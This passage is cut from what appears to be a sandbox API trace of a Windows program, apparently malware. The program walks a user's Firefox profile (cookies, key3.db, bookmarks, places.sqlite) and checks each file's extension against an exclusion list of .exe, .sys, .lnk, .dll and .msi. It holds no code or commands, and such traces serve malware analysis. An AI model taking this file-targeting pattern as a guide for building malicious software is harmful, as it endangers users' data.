lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.187] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.187] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.187] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0085.187] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0085.188] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0085.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.223] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x781f78 [0085.228] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.228] PathFindExtensionW (pszPath="InstallTime20131025151332") returned="" [0085.228] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0085.228] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0085.229] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0085.229] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0085.229] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0085.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7813e0 [0085.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x73c0b8 [0085.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813e0 | out: hHeap=0x6d0000) returned 1 [0085.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x7813e0 [0085.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0085.232] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x781f78 [0085.235] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.236] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0085.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.253] PathFindExtensionW (pszPath="addons.json") returned=".json" [0085.253] lstrcmpiW (lpString1=".json", lpString2=".exe") returned 1 [0085.253] lstrcmpiW (lpString1=".json", lpString2=".sys") returned -1 [0085.253] lstrcmpiW (lpString1=".json", lpString2=".lnk") returned -1 [0085.253] lstrcmpiW (lpString1=".json", lpString2=".dll") returned 1 [0085.253] lstrcmpiW (lpString1=".json", lpString2=".msi") returned -1 [0085.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c0c0 [0085.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x74c188 [0085.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x74c2b0 [0085.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c188 | out: hHeap=0x6d0000) returned 1 [0085.253] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0085.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.322] PathFindExtensionW (pszPath="bookmarks-2017-06-05_5.json") returned=".json" [0085.322] lstrcmpiW (lpString1=".json", lpString2=".exe") returned 1 [0085.322] lstrcmpiW (lpString1=".json", lpString2=".sys") returned -1 [0085.322] lstrcmpiW (lpString1=".json", lpString2=".lnk") returned -1 [0085.322] lstrcmpiW (lpString1=".json", lpString2=".dll") returned 1 [0085.322] lstrcmpiW (lpString1=".json", lpString2=".msi") returned -1 [0085.322] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77ec78 [0085.322] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x74c0c0 [0085.322] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77ec78 | out: hHeap=0x6d0000) returned 1 [0085.322] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x75c390 [0085.322] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.322] PathFindExtensionW (pszPath="bookmarks-2017-06-16_5.json") returned=".json" [0085.322] lstrcmpiW (lpString1=".json", lpString2=".exe") returned 1 [0085.322] lstrcmpiW (lpString1=".json", lpString2=".sys") returned -1 [0085.322] lstrcmpiW (lpString1=".json", lpString2=".lnk") returned -1 [0085.322] lstrcmpiW (lpString1=".json", lpString2=".dll") returned 1 [0085.323] lstrcmpiW (lpString1=".json", lpString2=".msi") returned -1 [0085.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77ec78 [0085.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x74c0c0 [0085.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77ec78 | out: hHeap=0x6d0000) returned 1 [0085.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x75c4a8 [0085.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.324] PathFindExtensionW (pszPath="cert8.db") returned=".db" [0085.324] lstrcmpiW (lpString1=".db", lpString2=".exe") returned -1 [0085.324] lstrcmpiW (lpString1=".db", lpString2=".sys") returned -1 [0085.324] lstrcmpiW (lpString1=".db", lpString2=".lnk") returned -1 [0085.325] lstrcmpiW (lpString1=".db", lpString2=".dll") returned -1 [0085.325] lstrcmpiW (lpString1=".db", lpString2=".msi") returned -1 [0085.325] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c0c0 [0085.325] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x74c188 [0085.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.325] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75c5c0 [0085.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c188 | out: hHeap=0x6d0000) returned 1 [0085.325] PathFindExtensionW (pszPath="compatibility.ini") returned=".ini" [0085.325] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0085.325] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0085.325] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0085.326] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0085.326] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0085.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c0c0 [0085.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x74c188 [0085.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77ec78 [0085.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c188 | out: hHeap=0x6d0000) returned 1 [0085.326] PathFindExtensionW (pszPath="content-prefs.sqlite") returned=".sqlite" [0085.326] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.326] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.326] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.326] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.326] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c0c0 [0085.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x74c188 [0085.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77ee48 [0085.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c188 | out: hHeap=0x6d0000) returned 1 [0085.326] PathFindExtensionW (pszPath="cookies.sqlite") returned=".sqlite" [0085.326] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.326] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.327] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.327] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.327] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c0c0 [0085.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x74c188 [0085.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75c698 [0085.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c188 | out: hHeap=0x6d0000) returned 1 [0085.327] PathFindExtensionW (pszPath="downloads.sqlite") returned=".sqlite" [0085.327] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.327] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.327] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.327] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.327] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c0c0 [0085.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x74c188 [0085.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77ef30 [0085.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c188 | out: hHeap=0x6d0000) returned 1 [0085.328] PathFindExtensionW (pszPath="extensions.ini") returned=".ini" [0085.328] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0085.328] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0085.328] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0085.328] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0085.328] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0085.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c0c0 [0085.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x74c188 [0085.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75c770 [0085.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c188 | out: hHeap=0x6d0000) returned 1 [0085.328] PathFindExtensionW (pszPath="extensions.sqlite") returned=".sqlite" [0085.328] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.328] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.328] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.328] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.328] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c0c0 [0085.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x74c188 [0085.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f018 [0085.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c188 | out: hHeap=0x6d0000) returned 1 [0085.329] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0085.371] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.375] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x781110 [0085.375] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.377] PathFindExtensionW (pszPath=".metadata") returned=".metadata" [0085.377] lstrcmpiW (lpString1=".metadata", lpString2=".exe") returned 1 [0085.377] lstrcmpiW (lpString1=".metadata", lpString2=".sys") returned -1 [0085.377] lstrcmpiW (lpString1=".metadata", lpString2=".lnk") returned 1 [0085.377] lstrcmpiW (lpString1=".metadata", lpString2=".dll") returned 1 [0085.377] lstrcmpiW (lpString1=".metadata", lpString2=".msi") returned -1 [0085.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x74c0c0 [0085.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x791fc0 [0085.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c0c0 | out: hHeap=0x6d0000) returned 1 [0085.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x74c0c0 [0085.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x791fc0 | out: hHeap=0x6d0000) returned 1 [0085.378] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0085.380] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.383] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0085.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.386] PathFindExtensionW (pszPath="818200132aebmoouht.sqlite") returned=".sqlite" [0085.386] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.386] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.386] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.386] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.386] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75c848 [0085.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e) returned 0x75c950 [0085.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c848 | out: hHeap=0x6d0000) returned 1 [0085.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x130) returned 0x75cad8 [0085.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c950 | out: hHeap=0x6d0000) returned 1 [0085.389] PathFindExtensionW (pszPath="key3.db") returned=".db" [0085.389] lstrcmpiW (lpString1=".db", lpString2=".exe") returned -1 [0085.389] lstrcmpiW (lpString1=".db", lpString2=".sys") returned -1 [0085.390] lstrcmpiW (lpString1=".db", lpString2=".lnk") returned -1 [0085.390] lstrcmpiW (lpString1=".db", lpString2=".dll") returned -1 [0085.390] lstrcmpiW (lpString1=".db", lpString2=".msi") returned -1 [0085.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c1c8 [0085.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75c848 [0085.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c1c8 | out: hHeap=0x6d0000) returned 1 [0085.390] PathFindExtensionW (pszPath="localstore.rdf") returned=".rdf" [0085.390] lstrcmpiW (lpString1=".rdf", lpString2=".exe") returned 1 [0085.390] lstrcmpiW (lpString1=".rdf", lpString2=".sys") returned -1 [0085.390] lstrcmpiW (lpString1=".rdf", lpString2=".lnk") returned 1 [0085.390] lstrcmpiW (lpString1=".rdf", lpString2=".dll") returned 1 [0085.390] lstrcmpiW (lpString1=".rdf", lpString2=".msi") returned 1 [0085.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74c1c8 [0085.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c1c8 | out: hHeap=0x6d0000) returned 1 [0085.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x74c1c8 [0085.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.391] PathFindExtensionW (pszPath="marionette.log") returned=".log" [0085.391] lstrcmpiW (lpString1=".log", lpString2=".exe") returned 1 [0085.391] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0085.391] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0085.391] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0085.391] lstrcmpiW (lpString1=".log", lpString2=".msi") returned -1 [0085.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75c910 [0085.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75cc10 [0085.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75cd50 [0085.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.392] PathFindExtensionW (pszPath="mimeTypes.rdf") returned=".rdf" [0085.392] lstrcmpiW (lpString1=".rdf", lpString2=".exe") returned 1 [0085.392] lstrcmpiW (lpString1=".rdf", lpString2=".sys") returned -1 [0085.392] lstrcmpiW (lpString1=".rdf", lpString2=".lnk") returned 1 [0085.392] lstrcmpiW (lpString1=".rdf", lpString2=".dll") returned 1 [0085.392] lstrcmpiW (lpString1=".rdf", lpString2=".msi") returned 1 [0085.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75ce28 [0085.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.392] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0085.394] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.396] PathFindExtensionW (pszPath="parent.lock") returned=".lock" [0085.396] lstrcmpiW (lpString1=".lock", lpString2=".exe") returned 1 [0085.396] lstrcmpiW (lpString1=".lock", lpString2=".sys") returned -1 [0085.396] lstrcmpiW (lpString1=".lock", lpString2=".lnk") returned 1 [0085.396] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0085.396] lstrcmpiW (lpString1=".lock", lpString2=".msi") returned -1 [0085.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75cf00 [0085.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.396] PathFindExtensionW (pszPath="permissions.sqlite") returned=".sqlite" [0085.396] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.396] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.396] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.396] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.396] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f100 [0085.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.397] PathFindExtensionW (pszPath="places.sqlite") returned=".sqlite" [0085.397] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.397] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.397] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.397] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.397] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75cfd8 [0085.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.397] PathFindExtensionW (pszPath="pluginreg.dat") returned=".dat" [0085.397] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0085.398] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0085.398] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0085.398] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0085.398] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0085.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d0b0 [0085.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.398] PathFindExtensionW (pszPath="prefs.js") returned=".js" [0085.398] lstrcmpiW (lpString1=".js", lpString2=".exe") returned 1 [0085.398] lstrcmpiW (lpString1=".js", lpString2=".sys") returned -1 [0085.398] lstrcmpiW (lpString1=".js", lpString2=".lnk") returned -1 [0085.398] lstrcmpiW (lpString1=".js", lpString2=".dll") returned 1 [0085.398] lstrcmpiW (lpString1=".js", lpString2=".msi") returned -1 [0085.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d188 [0085.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.399] PathFindExtensionW (pszPath="search.json") returned=".json" [0085.399] lstrcmpiW (lpString1=".json", lpString2=".exe") returned 1 [0085.399] lstrcmpiW (lpString1=".json", lpString2=".sys") returned -1 [0085.399] lstrcmpiW (lpString1=".json", lpString2=".lnk") returned -1 [0085.399] lstrcmpiW (lpString1=".json", lpString2=".dll") returned 1 [0085.399] lstrcmpiW (lpString1=".json", lpString2=".msi") returned -1 [0085.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: 